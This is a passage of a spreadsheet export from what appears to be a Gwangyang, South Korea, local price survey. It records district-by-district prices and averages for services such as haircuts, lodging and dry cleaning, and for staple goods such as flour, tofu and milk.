[24,"돼지갈비","식육식당 200g(국내산)",5,5,{"v":12800,"d":"12,800"},{"v":12800,"d":"12,800"},0,0,{"$f":"광양읍1!F59","v":{"v":14500,"d":"14,500"}},{"$f":"광양읍1!G59","v":{"v":14500,"d":"14,500"}},0,{"$f":"광양읍2!F59","v":{"v":13000,"d":"13,000"}},{"$f":"광양읍2!G59","v":{"v":13000,"d":"13,000"}},0,{"$f":"중마동1!F59","v":{"v":11500,"d":"11,500"}},{"$f":"중마동1!G59","v":{"v":11500,"d":"11,500"}},0,{"$f":"중마동2!F59","v":{"v":11500,"d":"11,500"}},{"$f":"중마동2!G59","v":{"v":11500,"d":"11,500"}},0,{"$f":"광영동!F59","v":{"v":13500,"d":"13,500"}},{"$f":"광영동!G59","v":{"v":13500,"d":"13,500"}},0,{"$f":"옥곡면!F59","v":0},{"$f":"옥곡면!G59","v":0},0]
[25,"쇠갈비","식육식당 200g(국내산)",3,3,{"v":39308.333333333336,"d":"39,308"},{"v":39308.333333333336,"d":"39,308"},0,0,{"$f":"광양읍1!F60","v":0},{"$f":"광양읍1!G60","v":0},0,{"$f":"광양읍2!F60","v":{"v":44925,"d":"44,925"}},{"$f":"광양읍2!G60","v":{"v":44925,"d":"44,925"}},0,{"$f":"중마동1!F60","v":{"v":41000,"d":"41,000"}},{"$f":"중마동1!G60","v":{"v":41000,"d":"41,000"}},0,{"$f":"중마동2!F60","v":0},{"$f":"중마동2!G60","v":0},0,{"$f":"광영동!F60","v":{"v":32000,"d":"32,000"}},{"$f":"광영동!G60","v":{"v":32000,"d":"32,000"}},0,{"$f":"옥곡면!F60","v":0},{"$f":"옥곡면!G60","v":0},0]
[26,"생맥주","500CC 1잔",6,6,{"v":3525,"d":"3,525"},{"v":3525,"d":"3,525"},0,0,{"$f":"광양읍1!F61","v":{"v":4000,"d":"4,000"}},{"$f":"광양읍1!G61","v":{"v":4000,"d":"4,000"}},0,{"$f":"광양읍2!F61","v":{"v":4000,"d":"4,000"}},{"$f":"광양읍2!G61","v":{"v":4000,"d":"4,000"}},0,{"$f":"중마동1!F61","v":{"v":3750,"d":"3,750"}},{"$f":"중마동1!G61","v":{"v":3750,"d":"3,750"}},0,{"$f":"중마동2!F61","v":{"v":3750,"d":"3,750"}},{"$f":"중마동2!G61","v":{"v":3750,"d":"3,750"}},0,{"$f":"광영동!F61","v":{"v":3900,"d":"3,900"}},{"$f":"광영동!G61","v":{"v":3900,"d":"3,900"}},0,{"$f":"옥곡면!F61","v":{"v":1750,"d":"1,750"}},{"$f":"옥곡면!G61","v":{"v":1750,"d":"1,750"}},0]
[27,"공동\n주택관리비","주공 18평1개월\n(공과금 제외)",6,6,{"v":55096.166666666664,"d":"55,096"},{"v":52429.5,"d":"52,430"},{"v":-2666.6666666666642,"d":"-2,667"},0,{"$f":"광양읍1!F62","v":{"v":52000,"d":"52,000"}},{"$f":"광양읍1!G62","v":{"v":36000,"d":"36,000"}},0,{"$f":"광양읍2!F62","v":{"v":51770,"d":"51,770"}},{"$f":"광양읍2!G62","v":{"v":51770,"d":"51,770"}},0,{"$f":"중마동1!F62","v":{"v":60000,"d":"60,000"}},{"$f":"중마동1!G62","v":{"v":60000,"d":"60,000"}},0,{"$f":"중마동2!F62","v":{"v":71130,"d":"71,130"}},{"$f":"중마동2!G62","v":{"v":71130,"d":"71,130"}},0,{"$f":"광영동!F62","v":{"v":54500,"d":"54,500"}},{"$f":"광영동!G62","v":{"v":54500,"d":"54,500"}},0,{"$f":"옥곡면!F62","v":{"v":41177,"d":"41,177"}},{"$f":"옥곡면!G62","v":{"v":41177,"d":"41,177"}},0]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",6,6,{"v":8833.333333333334,"d":"8,833"},{"v":8916.666666666666,"d":"8,917"},{"v":83.33333333333212,"d":"83"},0,{"$f":"광양읍1!F63","v":{"v":8000,"d":"8,000"}},{"$f":"광양읍1!G63","v":{"v":8500,"d":"8,500"}},0,{"$f":"광양읍2!F63","v":{"v":8000,"d":"8,000"}},{"$f":"광양읍2!G63","v":{"v":8000,"d":"8,000"}},0,{"$f":"중마동1!F63","v":{"v":10000,"d":"10,000"}},{"$f":"중마동1!G63","v":{"v":10000,"d":"10,000"}},0,{"$f":"중마동2!F63","v":{"v":9000,"d":"9,000"}},{"$f":"중마동2!G63","v":{"v":9000,"d":"9,000"}},0,{"$f":"광영동!F63","v":{"v":12000,"d":"12,000"}},{"$f":"광영동!G63","v":{"v":12000,"d":"12,000"}},0,{"$f":"옥곡면!F63","v":{"v":6000,"d":"6,000"}},{"$f":"옥곡면!G63","v":{"v":6000,"d":"6,000"}},0]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",5,5,{"v":5200,"d":"5,200"},{"v":5300,"d":"5,300"},100,0,{"$f":"광양읍1!F64","v":{"v":4500,"d":"4,500"}},{"$f":"광양읍1!G64","v":{"v":5000,"d":"5,000"}},0,{"$f":"광양읍2!F64","v":{"v":5000,"d":"5,000"}},{"$f":"광양읍2!G64","v":{"v":5000,"d":"5,000"}},0,{"$f":"중마동1!F64","v":{"v":6000,"d":"6,000"}},{"$f":"중마동1!G64","v":{"v":6000,"d":"6,000"}},0,{"$f":"중마동2!F64","v":{"v":4500,"d":"4,500"}},{"$f":"중마동2!G64","v":{"v":4500,"d":"4,500"}},0,{"$f":"광영동!F64","v":{"v":6000,"d":"6,000"}},{"$f":"광영동!G64","v":{"v":6000,"d":"6,000"}},0,{"$f":"옥곡면!F64","v":0},{"$f":"옥곡면!G64","v":0},0]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",1,1,{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,0,{"$f":"광양읍1!F65","v":{"v":13000,"d":"13,000"}},{"$f":"광양읍1!G65","v":{"v":13000,"d":"13,000"}},0,{"$f":"광양읍2!F65","v":0},{"$f":"광양읍2!G65","v":0},0,{"$f":"중마동1!F65","v":0},{"$f":"중마동1!G65","v":0},0,{"$f":"중마동2!F65","v":0},{"$f":"중마동2!G65","v":0},0,{"$f":"광영동!F65","v":0},{"$f":"광영동!G65","v":0},0,{"$f":"옥곡면!F65","v":0},{"$f":"옥곡면!G65","v":0},0]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",0,0,0,0,0,0,{"$f":"광양읍1!F66","v":0},{"$f":"광양읍1!G66","v":0},0,{"$f":"광양읍2!F66","v":0},{"$f":"광양읍2!G66","v":0},0,{"$f":"중마동1!F66","v":0},{"$f":"중마동1!G66","v":0},0,{"$f":"중마동2!F66","v":0},{"$f":"중마동2!G66","v":0},0,{"$f":"광영동!F66","v":0},{"$f":"광영동!G66","v":0},0,{"$f":"옥곡면!F66","v":0},{"$f":"옥곡면!G66","v":0},0]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",1,1,{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,0,{"$f":"광양읍1!F67","v":{"v":3500,"d":"3,500"}},{"$f":"광양읍1!G67","v":{"v":3500,"d":"3,500"}},0,{"$f":"광양읍2!F67","v":0},{"$f":"광양읍2!G67","v":0},0,{"$f":"중마동1!F67","v":0},{"$f":"중마동1!G67","v":0},0,{"$f":"중마동2!F67","v":0},{"$f":"중마동2!G67","v":0},0,{"$f":"광영동!F67","v":0},{"$f":"광영동!G67","v":0},0,{"$f":"옥곡면!F67","v":0},{"$f":"옥곡면!G67","v":0},0]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",3,3,{"v":3333.3333333333335,"d":"3,333"},{"v":3333.3333333333335,"d":"3,333"},0,0,{"$f":"광양읍1!F68","v":{"v":4000,"d":"4,000"}},{"$f":"광양읍1!G68","v":{"v":4000,"d":"4,000"}},0,{"$f":"광양읍2!F68","v":{"v":2000,"d":"2,000"}},{"$f":"광양읍2!G68","v":{"v":2000,"d":"2,000"}},0,{"$f":"중마동1!F68","v":0},{"$f":"중마동1!G68","v":0},0,{"$f":"중마동2!F68","v":{"v":4000,"d":"4,000"}},{"$f":"중마동2!G68","v":{"v":4000,"d":"4,000"}},0,{"$f":"광영동!F68","v":0},{"$f":"광영동!G68","v":0},0,{"$f":"옥곡면!F68","v":0},{"$f":"옥곡면!G68","v":0},0]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",5,5,{"v":139500,"d":"139,500"},{"v":139500,"d":"139,500"},0,0,{"$f":"광양읍1!F69","v":{"v":100000,"d":"100,000"}},{"$f":"광양읍1!G69","v":{"v":100000,"d":"100,000"}},0,{"$f":"광양읍2!F69","v":{"v":75000,"d":"75,000"}},{"$f":"광양읍2!G69","v":{"v":75000,"d":"75,000"}},0,{"$f":"중마동1!F69","v":{"v":147500,"d":"147,500"}},{"$f":"중마동1!G69","v":{"v":147500,"d":"147,500"}},null,{"$f":"중마동2!F69","v":{"v":225000,"d":"225,000"}},{"$f":"중마동2!G69","v":{"v":225000,"d":"225,000"}},0,{"$f":"광영동!F69","v":{"v":150000,"d":"150,000"}},{"$f":"광영동!G69","v":{"v":150000,"d":"150,000"}},0,{"$f":"옥곡면!F69","v":0},{"$f":"옥곡면!G69","v":0},0]
[35,"노래방\n이용료","일반인 저녁 1시간",6,6,{"v":22083.333333333332,"d":"22,083"},{"v":22083.333333333332,"d":"22,083"},0,0,{"$f":"광양읍1!F70","v":{"v":25000,"d":"25,000"}},{"$f":"광양읍1!G70","v":{"v":25000,"d":"25,000"}},0,{"$f":"광양읍2!F70","v":{"v":25000,"d":"25,000"}},{"$f":"광양읍2!G70","v":{"v":25000,"d":"25,000"}},0,{"$f":"중마동1!F70","v":{"v":25000,"d":"25,000"}},{"$f":"중마동1!G70","v":{"v":25000,"d":"25,000"}},0,{"$f":"중마동2!F70","v":{"v":20000,"d":"20,000"}},{"$f":"중마동2!G70","v":{"v":20000,"d":"20,000"}},0,{"$f":"광영동!F70","v":{"v":25000,"d":"25,000"}},{"$f":"광영동!G70","v":{"v":25000,"d":"25,000"}},0,{"$f":"옥곡면!F70","v":{"v":12500,"d":"12,500"}},{"$f":"옥곡면!G70","v":{"v":12500,"d":"12,500"}},0]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",5,5,{"v":10060,"d":"10,060"},{"v":10060,"d":"10,060"},0,0,{"$f":"광양읍1!F71","v":{"v":9000,"d":"9,000"}},{"$f":"광양읍1!G71","v":{"v":9000,"d":"9,000"}},0,{"$f":"광양읍2!F71","v":{"v":10900,"d":"10,900"}},{"$f":"광양읍2!G71","v":{"v":10900,"d":"10,900"}},0,{"$f":"중마동1!F71","v":{"v":10400,"d":"10,400"}},{"$f":"중마동1!G71","v":{"v":10400,"d":"10,400"}},0,{"$f":"중마동2!F71","v":{"v":10000,"d":"10,000"}},{"$f":"중마동2!G71","v":{"v":10000,"d":"10,000"}},0,{"$f":"광영동!F71","v":{"v":10000,"d":"10,000"}},{"$f":"광영동!G71","v":{"v":10000,"d":"10,000"}},0,{"$f":"옥곡면!F71","v":0},{"$f":"옥곡면!G71","v":0},0]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",5,5,{"v":19100,"d":"19,100"},{"v":19100,"d":"19,100"},0,0,{"$f":"광양읍1!F72","v":{"v":22500,"d":"22,500"}},{"$f":"광양읍1!G72","v":{"v":22500,"d":"22,500"}},0,{"$f":"광양읍2!F72","v":{"v":18500,"d":"18,500"}},{"$f":"광양읍2!G72","v":{"v":18500,"d":"18,500"}},0,{"$f":"중마동1!F72","v":{"v":19000,"d":"19,000"}},{"$f":"중마동1!G72","v":{"v":19000,"d":"19,000"}},0,{"$f":"중마동2!F72","v":{"v":19000,"d":"19,000"}},{"$f":"중마동2!G72","v":{"v":19000,"d":"19,000"}},0,{"$f":"광영동!F72","v":{"v":16500,"d":"16,500"}},{"$f":"광영동!G72","v":{"v":16500,"d":"16,500"}},0,{"$f":"옥곡면!F72","v":0},{"$f":"옥곡면!G72","v":0},0]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",5,5,830,830,0,0,{"$f":"광양읍1!F73","v":400},{"$f":"광양읍1!G73","v":400},0,{"$f":"광양읍2!F73","v":400},{"$f":"광양읍2!G73","v":400},0,{"$f":"중마동1!F73","v":450},{"$f":"중마동1!G73","v":450},0,{"$f":"중마동2!F73","v":400},{"$f":"중마동2!G73","v":400},0,{"$f":"광영동!F73","v":{"v":2500,"d":"2,500"}},{"$f":"광영동!G73","v":{"v":2500,"d":"2,500"}},0,{"$f":"옥곡면!F73","v":0},{"$f":"옥곡면!G73","v":0},0]
[39,"영상매체대여료","최신판 영화 DVD대여요금",0,0,0,0,0,0,{"$f":"광양읍1!F74","v":0},{"$f":"광양읍1!G74","v":0},0,{"$f":"광양읍2!F74","v":0},{"$f":"광양읍2!G74","v":0},0,{"$f":"중마동1!F74","v":0},{"$f":"중마동1!G74","v":0},0,{"$f":"중마동2!F74","v":0},{"$f":"중마동2!G74","v":0},0,{"$f":"광영동!F74","v":0},{"$f":"광영동!G74","v":0},0,{"$f":"옥곡면!F74","v":0},{"$f":"옥곡면!G74","v":0},0]
[40,"이용료(컷트)","성인조발 중류급 1회",6,6,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,0,{"$f":"광양읍1!F75","v":{"v":15000,"d":"15,000"}},{"$f":"광양읍1!G75","v":{"v":15000,"d":"15,000"}},0,{"$f":"광양읍2!F75","v":{"v":14500,"d":"14,500"}},{"$f":"광양읍2!G75","v":{"v":14500,"d":"14,500"}},0,{"$f":"중마동1!F75","v":{"v":18000,"d":"18,000"}},{"$f":"중마동1!G75","v":{"v":18000,"d":"18,000"}},0,{"$f":"중마동2!F75","v":{"v":12500,"d":"12,500"}},{"$f":"중마동2!G75","v":{"v":12500,"d":"12,500"}},0,{"$f":"광영동!F75","v":{"v":18000,"d":"18,000"}},{"$f":"광영동!G75","v":{"v":18000,"d":"18,000"}},0,{"$f":"옥곡면!F75","v":{"v":12000,"d":"12,000"}},{"$f":"옥곡면!G75","v":{"v":12000,"d":"12,000"}},0]
[41,"미용료","성인여자 파마(일반)",6,6,{"v":40416.666666666664,"d":"40,417"},{"v":40416.666666666664,"d":"40,417"},0,0,{"$f":"광양읍1!F76","v":{"v":45000,"d":"45,000"}},{"$f":"광양읍1!G76","v":{"v":45000,"d":"45,000"}},0,{"$f":"광양읍2!F76","v":{"v":32500,"d":"32,500"}},{"$f":"광양읍2!G76","v":{"v":32500,"d":"32,500"}},0,{"$f":"중마동1!F76","v":{"v":42500,"d":"42,500"}},{"$f":"중마동1!G76","v":{"v":42500,"d":"42,500"}},0,{"$f":"중마동2!F76","v":{"v":32500,"d":"32,500"}},{"$f":"중마동2!G76","v":{"v":32500,"d":"32,500"}},0,{"$f":"광영동!F76","v":{"v":40000,"d":"40,000"}},{"$f":"광영동!G76","v":{"v":40000,"d":"40,000"}},0,{"$f":"옥곡면!F76","v":{"v":50000,"d":"50,000"}},{"$f":"옥곡면!G76","v":{"v":50000,"d":"50,000"}},0]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",6,6,{"v":6625,"d":"6,625"},{"v":6625,"d":"6,625"},0,0,{"$f":"광양읍1!F77","v":{"v":7000,"d":"7,000"}},{"$f":"광양읍1!G77","v":{"v":7000,"d":"7,000"}},0,{"$f":"광양읍2!F77","v":{"v":8000,"d":"8,000"}},{"$f":"광양읍2!G77","v":{"v":8000,"d":"8,000"}},0,{"$f":"중마동1!F77","v":{"v":8000,"d":"8,000"}},{"$f":"중마동1!G77","v":{"v":8000,"d":"8,000"}},0,{"$f":"중마동2!F77","v":{"v":8000,"d":"8,000"}},{"$f":"중마동2!G77","v":{"v":8000,"d":"8,000"}},0,{"$f":"광영동!F77","v":{"v":8250,"d":"8,250"}},{"$f":"광영동!G77","v":{"v":8250,"d":"8,250"}},0,{"$f":"옥곡면!F77","v":500},{"$f":"옥곡면!G77","v":500},0]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",2,2,{"v":55000,"d":"55,000"},{"v":55000,"d":"55,000"},0,0,{"$f":"광양읍1!F78","v":0},{"$f":"광양읍1!G78","v":0},0,{"$f":"광양읍2!F78","v":0},{"$f":"광양읍2!G78","v":0},0,{"$f":"중마동1!F78","v":{"v":90000,"d":"90,000"}},{"$f":"중마동1!G78","v":{"v":90000,"d":"90,000"}},0,{"$f":"중마동2!F78","v":0},{"$f":"중마동2!G78","v":0},0,{"$f":"광영동!F78","v":0},{"$f":"광영동!G78","v":0},0,{"$f":"옥곡면!F78","v":{"v":20000,"d":"20,000"}},{"$f":"옥곡면!G78","v":{"v":20000,"d":"20,000"}},0]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",5,5,{"v":41500,"d":"41,500"},{"v":41500,"d":"41,500"},0,0,{"$f":"광양읍1!F79","v":{"v":37500,"d":"37,500"}},{"$f":"광양읍1!G79","v":{"v":37500,"d":"37,500"}},0,{"$f":"광양읍2!F79","v":{"v":37500,"d":"37,500"}},{"$f":"광양읍2!G79","v":{"v":37500,"d":"37,500"}},0,{"$f":"중마동1!F79","v":{"v":52500,"d":"52,500"}},{"$f":"중마동1!G79","v":{"v":52500,"d":"52,500"}},0,{"$f":"중마동2!F79","v":{"v":40000,"d":"40,000"}},{"$f":"중마동2!G79","v":{"v":40000,"d":"40,000"}},0,{"$f":"광영동!F79","v":{"v":40000,"d":"40,000"}},{"$f":"광영동!G79","v":{"v":40000,"d":"40,000"}},0,{"$f":"옥곡면!F79","v":0},{"$f":"옥곡면!G79","v":0},0]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",0,0,0,0,0,0,{"$f":"광양읍1!F80","v":0},{"$f":"광양읍1!G80","v":0},0,{"$f":"광양읍2!F80","v":0},{"$f":"광양읍2!G80","v":0},0,{"$f":"중마동1!F80","v":0},{"$f":"중마동1!G80","v":0},0,{"$f":"중마동2!F80","v":0},{"$f":"중마동2!G80","v":0},0,{"$f":"광영동!F80","v":0},{"$f":"광영동!G80","v":0},0,{"$f":"옥곡면!F80","v":0},{"$f":"옥곡면!G80","v":0},0]
[46,"PC방\n이용료","1회 이용시",5,5,{"v":1210,"d":"1,210"},{"v":1240,"d":"1,240"},30,0,{"$f":"광양읍1!F81","v":{"v":1350,"d":"1,350"}},{"$f":"광양읍1!G81","v":{"v":1500,"d":"1,500"}},0,{"$f":"광양읍2!F81","v":{"v":1400,"d":"1,400"}},{"$f":"광양읍2!G81","v":{"v":1400,"d":"1,400"}},0,{"$f":"중마동1!F81","v":{"v":1200,"d":"1,200"}},{"$f":"중마동1!G81","v":{"v":1200,"d":"1,200"}},0,{"$f":"중마동2!F81","v":{"v":1000,"d":"1,000"}},{"$f":"중마동2!G81","v":{"v":1000,"d":"1,000"}},0,{"$f":"광영동!F81","v":{"v":1100,"d":"1,100"}},{"$f":"광영동!G81","v":{"v":1100,"d":"1,100"}},0,{"$f":"옥곡면!F81","v":0},{"$f":"옥곡면!G81","v":0},0]
[47,"택배이용료","20kg이하, 타지역",6,6,{"v":7666.666666666667,"d":"7,667"},{"v":7666.666666666667,"d":"7,667"},0,0,{"$f":"광양읍1!F82","v":{"v":7000,"d":"7,000"}},{"$f":"광양읍1!G82","v":{"v":7000,"d":"7,000"}},0,{"$f":"광양읍2!F82","v":{"v":6000,"d":"6,000"}},{"$f":"광양읍2!G82","v":{"v":6000,"d":"6,000"}},0,{"$f":"중마동1!F82","v":{"v":6250,"d":"6,250"}},{"$f":"중마동1!G82","v":{"v":6250,"d":"6,250"}},0,{"$f":"중마동2!F82","v":{"v":6750,"d":"6,750"}},{"$f":"중마동2!G82","v":{"v":6750,"d":"6,750"}},0,{"$f":"광영동!F82","v":{"v":16000,"d":"16,000"}},{"$f":"광영동!G82","v":{"v":16000,"d":"16,000"}},0,{"$f":"옥곡면!F82","v":{"v":4000,"d":"4,000"}},{"$f":"옥곡면!G82","v":{"v":4000,"d":"4,000"}},0]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",1,1,{"v":13500,"d":"13,500"},{"v":13500,"d":"13,500"},0,0,{"$f":"광양읍1!F83","v":0},{"$f":"광양읍1!G83","v":0},0,{"$f":"광양읍2!F83","v":0},{"$f":"광양읍2!G83","v":0},0,{"$f":"중마동1!F83","v":0},{"$f":"중마동1!G83","v":0},0,{"$f":"중마동2!F83","v":0},{"$f":"중마동2!G83","v":0},0,{"$f":"광영동!F83","v":{"v":13500,"d":"13,500"}},{"$f":"광영동!G83","v":{"v":13500,"d":"13,500"}},0,{"$f":"옥곡면!F83","v":0},{"$f":"옥곡면!G83","v":0},0]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",0,0,0,0,0,0,{"$f":"광양읍1!F84","v":0},{"$f":"광양읍1!G84","v":0},0,{"$f":"광양읍2!F84","v":0},{"$f":"광양읍2!G84","v":0},0,{"$f":"중마동1!F84","v":0},{"$f":"중마동1!G84","v":0},0,{"$f":"중마동2!F84","v":0},{"$f":"중마동2!G84","v":0},0,{"$f":"광영동!F84","v":0},{"$f":"광영동!G84","v":0},0,{"$f":"옥곡면!F84","v":0},{"$f":"옥곡면!G84","v":0},0]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",6,6,{"v":5755,"d":"5,755"},{"v":5755,"d":"5,755"},0,{"$f":"IF(F86=0,0,((G86-F86)/F86))","v":0},{"$f":"광양읍1!F86","v":{"v":5470,"d":"5,470"}},{"$f":"광양읍1!G86","v":{"v":5470,"d":"5,470"}},{"$f":"광양읍1!H86","v":0},{"$f":"광양읍2!F86","v":{"v":6050,"d":"6,050"}},{"$f":"광양읍2!G86","v":{"v":6050,"d":"6,050"}},{"$f":"광양읍2!H86","v":0},{"$f":"중마동1!F86","v":{"v":5700,"d":"5,700"}},{"$f":"중마동1!G86","v":{"v":5700,"d":"5,700"}},{"$f":"중마동1!H86","v":0},{"$f":"중마동2!F86","v":{"v":6335,"d":"6,335"}},{"$f":"중마동2!G86","v":{"v":6335,"d":"6,335"}},{"$f":"중마동2!H86","v":0},{"$f":"광영동!F86","v":{"v":5625,"d":"5,625"}},{"$f":"광영동!G86","v":{"v":5625,"d":"5,625"}},{"$f":"광영동!H86","v":0},{"$f":"옥곡면!F86","v":{"v":5350,"d":"5,350"}},{"$f":"옥곡면!G86","v":{"v":5350,"d":"5,350"}},{"$f":"옥곡면!H86","v":0}]
[2,"두부","공장제품 1모",6,6,{"v":1314.1666666666667,"d":"1,314"},{"v":1320,"d":"1,320"},{"v":5.8333333333332575,"d":"6"},{"$f":"IF(F87=0,0,((G87-F87)/F87))","v":{"v":0.004438807863031013,"d":"0"}},{"$f":"광양읍1!F87","v":{"v":1350,"d":"1,350"}},{"$f":"광양읍1!G87","v":{"v":1350,"d":"1,350"}},{"$f":"광양읍1!H87","v":0},{"$f":"광양읍2!F87","v":{"v":1475,"d":"1,475"}},{"$f":"광양읍2!G87","v":{"v":1475,"d":"1,475"}},{"$f":"광양읍2!H87","v":0},{"$f":"중마동1!F87","v":{"v":1590,"d":"1,590"}},{"$f":"중마동1!G87","v":{"v":1625,"d":"1,625"}},{"$f":"중마동1!H87","v":35},{"$f":"중마동2!F87","v":{"v":1425,"d":"1,425"}},{"$f":"중마동2!G87","v":{"v":1425,"d":"1,425"}},{"$f":"중마동2!H87","v":0},{"$f":"광영동!F87","v":970},{"$f":"광영동!G87","v":970},{"$f":"광영동!H87","v":0},{"$f":"옥곡면!F87","v":{"v":1075,"d":"1,075"}},{"$f":"옥곡면!G87","v":{"v":1075,"d":"1,075"}},{"$f":"옥곡면!H87","v":0}]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",6,6,{"v":1133.3333333333333,"d":"1,133"},{"v":1133.3333333333333,"d":"1,133"},0,0,{"$f":"광양읍1!F88","v":{"v":1135,"d":"1,135"}},{"$f":"광양읍1!G88","v":{"v":1135,"d":"1,135"}},{"$f":"광양읍1!H88","v":0},{"$f":"광양읍2!F88","v":{"v":1200,"d":"1,200"}},{"$f":"광양읍2!G88","v":{"v":1200,"d":"1,200"}},{"$f":"광양읍2!H88","v":0},{"$f":"중마동1!F88","v":{"v":1070,"d":"1,070"}},{"$f":"중마동1!G88","v":{"v":1070,"d":"1,070"}},{"$f":"중마동1!H88","v":0},{"$f":"중마동2!F88","v":{"v":1175,"d":"1,175"}},{"$f":"중마동2!G88","v":{"v":1175,"d":"1,175"}},{"$f":"중마동2!H88","v":0},{"$f":"광영동!F88","v":{"v":1140,"d":"1,140"}},{"$f":"광영동!G88","v":{"v":1140,"d":"1,140"}},{"$f":"광영동!H88","v":0},{"$f":"옥곡면!F88","v":{"v":1080,"d":"1,080"}},{"$f":"옥곡면!G88","v":{"v":1080,"d":"1,080"}},{"$f":"옥곡면!H88","v":0}]
[4,"식용유","콩기름 1.8ml",6,6,{"v":7870.833333333333,"d":"7,871"},{"v":7558.333333333333,"d":"7,558"},{"v":-312.5,"d":"-313"},{"v":-0.03970354685018528,"d":"-0"},{"$f":"광양읍1!F89","v":{"v":6985,"d":"6,985"}},{"$f":"광양읍1!G89","v":{"v":6985,"d":"6,985"}},{"$f":"광양읍1!H89","v":0},{"$f":"광양읍2!F89","v":{"v":8850,"d":"8,850"}},{"$f":"광양읍2!G89","v":{"v":8850,"d":"8,850"}},{"$f":"광양읍2!H89","v":0},{"$f":"중마동1!F89","v":{"v":8480,"d":"8,480"}},{"$f":"중마동1!G89","v":{"v":8480,"d":"8,480"}},{"$f":"중마동1!H89","v":0},{"$f":"중마동2!F89","v":{"v":8950,"d":"8,950"}},{"$f":"중마동2!G89","v":{"v":7575,"d":"7,575"}},{"$f":"중마동2!H89","v":{"v":-1375,"d":"-1,375"}},{"$f":"광영동!F89","v":{"v":6980,"d":"6,980"}},{"$f":"광영동!G89","v":{"v":6480,"d":"6,480"}},{"$f":"광영동!H89","v":-500},{"$f":"옥곡면!F89","v":{"v":6980,"d":"6,980"}},{"$f":"옥곡면!G89","v":{"v":6980,"d":"6,980"}},{"$f":"옥곡면!H89","v":0}]
[5,"설탕","정백당 1kg",6,6,{"v":2790.8333333333335,"d":"2,791"},{"v":2790.8333333333335,"d":"2,791"},0,0,{"$f":"광양읍1!F90","v":{"v":2935,"d":"2,935"}},{"$f":"광양읍1!G90","v":{"v":2935,"d":"2,935"}},{"$f":"광양읍1!H90","v":0},{"$f":"광양읍2!F90","v":{"v":3250,"d":"3,250"}},{"$f":"광양읍2!G90","v":{"v":3250,"d":"3,250"}},{"$f":"광양읍2!H90","v":0},{"$f":"중마동1!F90","v":{"v":2380,"d":"2,380"}},{"$f":"중마동1!G90","v":{"v":2380,"d":"2,380"}},{"$f":"중마동1!H90","v":0},{"$f":"중마동2!F90","v":{"v":3120,"d":"3,120"}},{"$f":"중마동2!G90","v":{"v":3120,"d":"3,120"}},{"$f":"중마동2!H90","v":0},{"$f":"광영동!F90","v":{"v":2680,"d":"2,680"}},{"$f":"광영동!G90","v":{"v":2680,"d":"2,680"}},{"$f":"광영동!H90","v":0},{"$f":"옥곡면!F90","v":{"v":2380,"d":"2,380"}},{"$f":"옥곡면!G90","v":{"v":2380,"d":"2,380"}},{"$f":"옥곡면!H90","v":0}]
[6,"생수","플라스틱 1병(500㎖)",6,6,{"v":438.3333333333333,"d":"438"},{"v":438.3333333333333,"d":"438"},0,0,{"$f":"광양읍1!F91","v":320},{"$f":"광양읍1!G91","v":320},{"$f":"광양읍1!H91","v":0},{"$f":"광양읍2!F91","v":425},{"$f":"광양읍2!G91","v":425},{"$f":"광양읍2!H91","v":0},{"$f":"중마동1!F91","v":455},{"$f":"중마동1!G91","v":455},{"$f":"중마동1!H91","v":0},{"$f":"중마동2!F91","v":575},{"$f":"중마동2!G91","v":575},{"$f":"중마동2!H91","v":0},{"$f":"광영동!F91","v":515},{"$f":"광영동!G91","v":515},{"$f":"광영동!H91","v":0},{"$f":"옥곡면!F91","v":340},{"$f":"옥곡면!G91","v":340},{"$f":"옥곡면!H91","v":0}]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",6,6,{"v":1750,"d":"1,750"},{"v":1756.6666666666667,"d":"1,757"},{"v":6.6666666666667425,"d":"7"},{"v":0.003809523809523853,"d":"0"},{"$f":"광양읍1!F92","v":{"v":1680,"d":"1,680"}},{"$f":"광양읍1!G92","v":{"v":1680,"d":"1,680"}},{"$f":"광양읍1!H92","v":0},{"$f":"광양읍2!F92","v":{"v":1875,"d":"1,875"}},{"$f":"광양읍2!G92","v":{"v":1875,"d":"1,875"}},{"$f":"광양읍2!H92","v":0},{"$f":"중마동1!F92","v":{"v":1695,"d":"1,695"}},{"$f":"중마동1!G92","v":{"v":1695,"d":"1,695"}},{"$f":"중마동1!H92","v":0},{"$f":"중마동2!F92","v":{"v":1820,"d":"1,820"}},{"$f":"중마동2!G92","v":{"v":1860,"d":"1,860"}},{"$f":"중마동2!H92","v":40},{"$f":"광영동!F92","v":{"v":1760,"d":"1,760"}},{"$f":"광영동!G92","v":{"v":1760,"d":"1,760"}},{"$f":"광영동!H92","v":0},{"$f":"옥곡면!F92","v":{"v":1670,"d":"1,670"}},{"$f":"옥곡면!G92","v":{"v":1670,"d":"1,670"}},{"$f":"옥곡면!H92","v":0}]
